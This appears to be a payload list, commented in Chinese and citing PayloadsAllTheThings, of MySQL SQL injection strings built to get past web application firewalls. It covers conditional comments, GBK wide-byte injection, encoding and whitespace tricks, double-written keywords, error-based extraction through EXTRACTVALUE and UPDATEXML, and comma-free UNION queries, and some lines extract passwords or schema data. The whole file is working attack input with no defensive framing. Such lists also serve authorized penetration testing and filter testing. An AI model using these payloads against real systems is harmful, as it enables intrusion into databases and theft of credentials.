# SQL Injection WAF Bypass Payloads
# 来源: PayloadsAllTheThings MySQL Injection, 大神级WAF绕过技术
# 包含: 科学计数法、条件注释、宽字节注入、编码绕过等

# === 科学计数法绕过 (Scientific Notation) ===
# MySQL中 1.e(xxx) 等价于 xxx
# 例如: 1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70
' or 1.e('')='
1' or 1.e(1) or '1'='1
' or 1.e(1)='1
1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2
SELECT table_name FROM information_schema 1.e.tables
SELECT table_name FROM information_schema .tables

# === MySQL 条件注释绕过 (Conditional Comments) ===
# /*!12345UNION*/ 当MySQL版本>=12.345时执行
/*!50000UNION*/
/*!50000SELECT*/
/*!50000AND*/
/*!50000OR*/
/*!12345UNION*/
/*!31337SELECT*/
/*!50000'*/OR/*!50000'1'='1*/--
' /*!OR*/ '1'='1'--
/*!50000UNION*//*!50000SELECT*/1,2,3--
' /*!50000AND*/ 1=1--
' /*!50000OR*/ 1=1--
/*!UNION*//*!SELECT*/1,2,3--
' /*!AND*/ '1'='1'--
' /*!OR*/ '1'='1'--

# === 宽字节注入 (Wide Byte Injection - GBK) ===
# 当SET NAMES gbk时，%bf%27 会被解析为 縗'
%bf%27 OR 1=1--
%bf' OR 1=1--
%a1%27 OR 1=1--
%8c%a8%27 OR 1=1--
%bf%5c' OR 1=1--
%bf%27%20OR%201=1--
%bf%27%20OR%20%271%27=%271
%bf%27%20UNION%20SELECT%201,2,3--
%bf%27%20AND%201=1--
%bf%27%20AND%20%271%27=%271
縗' OR 1=1--
運' OR 1=1--

# === 空格绕过 ===
'/**/OR/**/1=1--
'%09OR%091=1--
'%0aOR%0a1=1--
'%0bOR%0b1=1--
'%0cOR%0c1=1--
'%0dOR%0d1=1--
'+OR+1=1--
'%a0OR%a01=1--
'%20OR%201=1--
'/**/AND/**/1=1--
'/**/UNION/**/SELECT/**/1,2,3--
'%09UNION%09SELECT%091,2,3--
'%0aUNION%0aSELECT%0a1,2,3--
'(/**/OR/**/1=1)--
'(/**/AND/**/1=1)--

# === 注释绕过 ===
'/**/or/**/1/**/=/**/1
'/**/or/**/1/**/=/**/1--
'/**/or/**/1/**/=/**/1#
'/**/union/**/select/**/1,2,3--
'/**/and/**/1=1--
'/**/and/**/1=1#
uni/**/on sel/**/ect 1,2,3--
un/**/ion se/**/lect 1,2,3--
/*!UNION*/ /*!SELECT*/ 1,2,3--
' /*!UNION*/ /*!SELECT*/ NULL--
' UNION%0aSELECT%0aNULL--

# === 大小写混合绕过 ===
' oR '1'='1'--
' Or '1'='1'--
' OR '1'='1'--
' UnIoN SeLeCt NULL--
' uNiOn SeLeCt 1,2,3--
' UnIoN aLl SeLeCt 1,2,3--
' AnD 1=1--
' aNd 1=1--
' oR 1=1--
' Or 1=1--

# === 双写绕过 ===
' OORR '1'='1'--
' ANANDD 1=1--
' OORR 1=1--
' UUNIONNION SSELECTELECT 1,2,3--
' SELSELECTECT 1,2,3--
' UNUNIONION SELSELECTECT 1,2,3--

# === URL编码绕过 ===
%27%20OR%20%271%27%3D%271
%27%20OR%20%271%27%3D%271%27--
%27%20OR%201=1--
%27%20OR%201=1%23
%27%20UNION%20SELECT%201,2,3--
%252527%2520OR%25201=1--
%25252527%252520OR%2525201=1--

# === 十六进制编码绕过 ===
' OR 0x31=0x31--
' AND 0x31=0x31--
' UNION SELECT 0x61646d696e--
' OR username=0x61646d696e--
' AND password=0x70617373776f7264--

# === Unicode编码绕过 ===
%u0027%u0020OR%u00201=1--
%u0027%u0020UNION%u0020SELECT%u00201,2,3--
\u0027 OR 1=1--
\u0027 UNION SELECT 1,2,3--

# === 换行符绕过 ===
'%0aOR%0a1=1--
'%0dOR%0d1=1--
'%0a%0dOR%0a%0d1=1--
' OR%0a1=1--
' OR%0d1=1--
' UNION%0aSELECT%0a1,2,3--
' UNION%0dSELECT%0d1,2,3--

# === 特殊字符绕过 ===
'-'
'&'
'^'
'*'
'|'
'||'6
(||6)
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))

# === information_schema 替代 ===
# MySQL >= 5.7
SELECT * FROM mysql.innodb_table_stats;
SELECT * FROM sys.schema_table_statistics;
SHOW TABLES IN database_name;

# === VERSION() 替代 ===
SELECT @@version;
SELECT @@innodb_version;
SELECT @@GLOBAL.VERSION;
SELECT version();

# === GROUP_CONCAT 替代 (MySQL >= 5.7.22) ===
SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES;

# === 特殊函数绕过 ===
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
' AND EXP(~(SELECT * FROM (SELECT version())x))--
' AND GTID_SUBSET(CONCAT('~',version(),'~'),1337)--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',version(),'~')) USING utf8)))--

# === 无引号绕过 ===
' OR 1=1--
' OR 1 LIKE 1--
' OR 1 BETWEEN 0 AND 2--
' OR 1 IN (1)--
' OR 1 REGEXP 1--
' OR 1 RLIKE 1--

# === 无逗号绕过 ===
' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c--
' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b--
LIMIT 1 OFFSET 0
SUBSTR(data FROM 1 FOR 1)
MID(data FROM 1 FOR 1)

# === 无空格无逗号 ===
'UNION(SELECT(1)FROM(SELECT(1))a)--
'UNION(SELECT(table_name)FROM(information_schema.tables))--
